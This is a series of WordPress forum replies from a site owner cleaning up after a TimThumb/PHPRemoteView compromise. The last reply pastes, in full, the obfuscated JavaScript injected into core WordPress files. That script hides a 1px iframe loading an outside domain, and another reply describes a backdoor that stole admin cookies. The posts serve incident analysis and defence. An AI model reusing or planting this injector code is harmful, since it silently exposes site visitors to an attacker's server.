Elmo_is_evil
Forum Replies Created
-
Ok, thank you !
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hackThis may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can’t find an iframe or “counter” in the source code. Where is it, so I can know if it’s gone?
Because it’s loaded by a JS file… Clever way to hide this kind of thing ….
My Wp installation is ok now, i didn’t delete and reinstall, but i basically did a byte by byte comparison, of the file (with one of my backup, and the file from 3.2.1).
But anyway, in my case, the goal was to analyses what they did ….
The best way to be secure, is obviously to delete and reinstall ….
(Sorry for my English this morning, still no coffee in the system …)
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange ErrorsCool info Mvied, i will check with one of my dynamic ip VPN …..
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hackDamn sometime i’m a tool, i just forgot to upload the clean wp-config.php ….
Anyway, still looking to be sure ….
Spirit_of_Martin, my php is a little bit rusty, but, basically, this bit of php, gave the attacker the cookie of the admin, in the first condition, the second look like some kind of scanner/patcher, and the third a file downloader ….
My guess is that there’s a tool on top of it (On another server or computer) ….
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hackGot this as well after being affected by PHPRemoteView via timthumb ….
Now PHPRemoteView is gone, timthumb is up to date, but after removing it yesterday (In my case a JS), it came back this morning …
Mine was embedded in a JS, \wp-includes\js\l10n.js yesterday, and this morning \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …. The code is obfuscated ….
I already mention it on a PHPRemoteView topic ….
http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange ErrorsWell, i’ve seen 2 other site who got this, after being affected by the PHPRemoteView via timthumb ….
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange ErrorsHello all, like many of you, one of my site was affected by this crap…
But I’ve found something else after cleaning it, a little iframe, in a javascript (Obfuscated), in my case it was in \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …. `
var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));And it’s basically add an iframe going to : http://counter-wordpress.com/frame.php …. It’s obviously engineer to be stealth … As it’s not showing in your html source, and loaded by a wordpress JS, and is probably don’t do much at this moment (Probably in standby) ….
Anyone else have this ?